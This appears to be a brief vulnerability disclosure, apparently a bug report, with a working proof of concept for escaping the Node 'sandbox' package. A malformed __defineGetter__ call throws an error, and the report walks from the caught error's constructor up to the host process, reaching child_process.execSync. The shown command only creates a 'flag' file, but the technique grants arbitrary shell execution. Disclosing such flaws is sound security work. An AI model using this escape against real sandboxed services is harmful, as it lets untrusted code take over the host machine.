Sandbox Escape Bug

[seongil-wi]

• Sandbox version: 0.8.6
• Node version: 18.15.0

var Sandbox = require("sandbox")
var code = `
    try{ 
__defineGetter__("x", );

 } catch(ret){
    ret.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch flag'); 
}
`

s = new Sandbox()
s.run(code)

Sandbox can be escaped by calling __defineGetter__ or __defineSetter__ function. Also, we can execute arbitrary shell code using process module.